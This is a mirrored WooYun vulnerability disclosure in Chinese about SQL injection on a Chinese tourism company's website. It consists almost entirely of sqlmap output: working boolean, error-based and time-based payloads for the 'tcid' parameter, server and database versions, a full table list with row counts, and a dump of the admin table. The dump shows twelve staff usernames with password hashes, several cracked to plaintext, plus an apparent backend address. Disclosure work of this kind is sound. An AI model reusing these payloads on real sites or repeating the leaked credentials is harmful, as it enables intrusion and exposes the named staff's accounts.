乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-23: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-07: 厂商已经主动忽略漏洞,细节向公众公开
订房信息泄露管理员邮箱泄露支付秘钥九华旅游(股票代码603199)
注入点
http://www.jiuhuashan.cc/expand_ticket/?tcid=4
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: tcid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tcid=4) AND 2762=2762 AND (9972=9972 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: tcid=4) AND (SELECT 2623 FROM(SELECT COUNT(*),CONCAT(0x716a626271,(SELECT (ELT(2623=2623,1))),0x7162787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2418=2418 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: tcid=4) AND (SELECT * FROM (SELECT(SLEEP(10)))LuZw) AND (8920=8920---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.2.13back-end DBMS: MySQL 5.0available databases [2]:[*] information_schema[*] newjiuhuashansqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: tcid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tcid=4) AND 2762=2762 AND (9972=9972 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: tcid=4) AND (SELECT 2623 FROM(SELECT COUNT(*),CONCAT(0x716a626271,(SELECT (ELT(2623=2623,1))),0x7162787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2418=2418 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: tcid=4) AND (SELECT * FROM (SELECT(SLEEP(10)))LuZw) AND (8920=8920---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.2.13back-end DBMS: MySQL 5.0Database: newjiuhuashan[191 tables]+--------------------------------+| ad || ad_position || admin || admin_group || admin_module || admin_module_operate || admin_privileges || area || article || article_cate || article_pic || article_video || bus || bus_brand || bus_channel || bus_channel_group || bus_city || bus_order || bus_pic || bus_price || bus_price_project || bus_price_project_price || bus_price_type || bus_type || bus_type_price_project || bus_vas || bus_vas_order || channel || channel_group || compose || for_buddha || for_thing || get_ticket_log || guestbook || guide || guide_channel || guide_channel_group || guide_order || guide_pic || guide_price || guide_price_project || guide_price_project_price || guide_price_type || hotel || hotel_pic || hotel_price || hotel_price140102 || hotel_price_project || hotel_price_project_price || hotel_price_type || hotel_price_type_content || hotel_room || hotel_room_allot || hotel_room_channel || hotel_room_channel_group || hotel_room_num || hotel_room_order || hotel_room_order_info || hotel_room_pic || hotel_room_price || hotel_room_price_project || hotel_room_price_project_price || hotel_room_price_type || hotel_room_type || hotel_service || hotel_service_cate || hotel_service_cate_content || hotel_service_channel || hotel_service_channel_group || hotel_service_info || hotel_service_meeting_put || hotel_service_order || hotel_service_order_info || hotel_service_pic || hotel_service_vas || income_log || indent || intro || iptocity || line || line_city || line_client || line_content || line_dir || line_goal || line_list || line_order || line_order_info || line_pic || line_price || line_price_project || line_price_project_price || line_price_project_temp || line_price_type || line_rank || line_temp || line_topic || line_travel || links || links_cate || mail_config || mail_message || member_group || members || my_tags || mycart || mycart_vas || operate_order_log || operate_shortcut || order_status_log || orders || other_fees || package || package_cate || package_channel || package_channel_group || package_order || package_pic || pay_log || pay_method || personal_line || plate || recom_position || redeem_place || rent_car || rent_car_area || rent_car_brand || rent_car_channel || rent_car_channel_group || rent_car_content || rent_car_num || rent_car_order || rent_car_pic || rent_car_price || rent_car_price_project || rent_car_service_point || rent_car_vas || rent_car_vas_cart || rent_car_vas_order || route || route_ip || runningtime || s_pic || sarea || sarea_cate || sms_config || specialty || specialty_channel || specialty_channel_group || specialty_order || specialty_order_info || specialty_pic || specialty_type || ticket || ticket_cate || ticket_cate_content || ticket_cate_pic || ticket_channel || ticket_channel_group || ticket_content || ticket_order || ticket_order_info || ticket_pic || ticket_price || ticket_price_project || ticket_price_project_price || ticket_price_type || ticket_price_type_content || ticket_vas || tpl || uc_admins || uc_applications || uc_badwords || uc_domains || uc_failedlogins || uc_feeds || uc_friends || uc_mailqueue || uc_memberfields || uc_members || uc_mergemembers || uc_newpm || uc_notelist || uc_pms || uc_protectedmembers || uc_settings || uc_sqlcache || uc_tags || uc_vars || web_config || wish |+--------------------------------+Database: newjiuhuashan+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| iptocity | 319356 || route_ip | 187150 || hotel_room_price | 50412 || hotel_price140102 | 47530 || for_buddha | 25180 || ticket_price | 11894 || article | 10218 || hotel_room_num | 10037 || line_price | 9423 || uc_memberfields | 8976 || uc_members | 8976 || article_pic | 3549 || wish | 2878 || guestbook | 2286 || uc_pms | 1331 || mail_message | 1004 || bus_price | 894 || orders | 763 || members | 760 || admin_privileges | 721 || s_pic | 497 || hotel_room_order | 428 || hotel_room_pic | 414 || personal_line | 389 || admin_module_operate | 342 || ticket_order_info | 308 || guide_price | 272 || ticket_order | 260 || hotel_service_pic | 244 || hotel_room_price_project_price | 230 || hotel_room_price_project | 215 || article_cate | 201 || operate_order_log | 200 || bus | 189 || mycart | 154 || article_video | 114 || hotel_price_project_price | 103 || hotel_pic | 99 || route | 99 || sarea | 81 || line_list | 70 || pay_log | 65 || rent_car_price | 63 || line_order | 61 || hotel_service | 58 || hotel_room_order_info | 53 || income_log | 53 || ad | 52 || hotel_price_project | 50 || links | 49 || my_tags | 48 || rent_car_pic | 48 || order_status_log | 47 || line_price_project_price | 46 || compose | 39 || hotel_room_type | 39 || hotel_room | 37 || bus_city | 34 || ad_position | 33 || line_price_project | 33 || hotel_room_price_type | 30 || line | 30 || line_content | 30 || admin | 28 || ticket_pic | 28 || mail_config | 27 || sms_config | 27 || hotel_service_info | 26 || uc_settings | 24 || ticket_price_project_price | 23 || admin_module | 21 || hotel_service_order | 21 || hotel_room_allot | 18 || rent_car_area | 17 || ticket_price_project | 16 || ticket_price_type | 16 || ticket_price_type_content | 16 || specialty_order | 14 || intro | 13 || line_price_type | 13 || operate_shortcut | 13 || rent_car_order | 13 || rent_car_vas | 13 || bus_price_project_price | 12 || ticket_channel_group | 12 || uc_notelist | 12 || specialty_pic | 11 || uc_friends | 11 || hotel_service_channel_group | 10 || line_city | 10 || redeem_place | 9 || rent_car | 9 || rent_car_content | 9 || tpl | 9 || plate | 8 || recom_position | 8 || bus_type | 7 || get_ticket_log | 7 || line_pic | 7 || package_pic | 7 || uc_vars | 7 || bus_price_project | 6 || hotel | 6 || hotel_price_type | 6 || hotel_price_type_content | 6 || specialty | 6 || ticket | 6 || ticket_content | 6 || admin_group | 5 || hotel_service_cate | 5 || hotel_service_cate_content | 5 || hotel_service_meeting_put | 5 || links_cate | 5 || pay_method | 5 || bus_channel_group | 4 || hotel_room_channel_group | 4 || line_dir | 4 || package_order | 4 || specialty_channel_group | 4 || ticket_cate | 4 || ticket_cate_content | 4 || bus_brand | 3 || bus_vas | 3 || guide_order | 3 || line_client | 3 || line_rank | 3 || member_group | 3 || rent_car_brand | 3 || rent_car_num | 3 || rent_car_price_project | 3 || area | 2 || bus_price_type | 2 || channel_group | 2 || guide_channel_group | 2 || guide_price_project | 2 || guide_price_project_price | 2 || line_goal | 2 || package_channel_group | 2 || rent_car_channel_group | 2 || rent_car_vas_cart | 2 || sarea_cate | 2 || specialty_type | 2 || ticket_vas | 2 || uc_applications | 2 || uc_protectedmembers | 2 || bus_order | 1 || channel | 1 || guide | 1 || guide_price_type | 1 || hotel_service_channel | 1 || hotel_service_vas | 1 || line_topic | 1 || line_travel | 1 || other_fees | 1 || package_cate | 1 || package_channel | 1 || uc_admins | 1 || uc_failedlogins | 1 || web_config | 1 |+--------------------------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: tcid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tcid=4) AND 2762=2762 AND (9972=9972 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: tcid=4) AND (SELECT 2623 FROM(SELECT COUNT(*),CONCAT(0x716a626271,(SELECT (ELT(2623=2623,1))),0x7162787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2418=2418 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: tcid=4) AND (SELECT * FROM (SELECT(SLEEP(10)))LuZw) AND (8920=8920---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.2.13back-end DBMS: MySQL 5.0Database: newjiuhuashanTable: admin[12 entries]+-------------------------------------------+------------+| admin_pass | admin_name |+-------------------------------------------+------------+| 5fab2371ef76580f044d4ce39b94901b | admin || 8f2e74bf8baf0e0ca8778c440c8dfcf6 (woaishe)| raojun || 682ce69d7111440079343a3ad2297009 | panda || 800a53aa5a1b319bd86c4e1d496f2af8 | yefei || b4096479db9125c874222697b6522df4 | zhaoqh || ef33c351893e7baa713ff4fe560f694b | lqf || f75991e2ee1593e2ca84e3cb8ddfd906 | dx || 0b5d9ca0acb73689904f41a035af4ad7 | weihua || 0276cbf4fbfedd53ba48720a58df77e3 (222111) | chl || 96e79218965eb72c92a549dd5a330112 (111111) | nieg || 4c3141ef4b76d341fbd2efb86241ac34 | jhgf || d8fee065fbfb4ee8ca989f9db2a47651 | zhusf |+-------------------------------------------+------------+
感谢chamd5破解
后台地址
http://www.ips.com.cn/
解决注入
未能联系到厂商或者厂商积极拒绝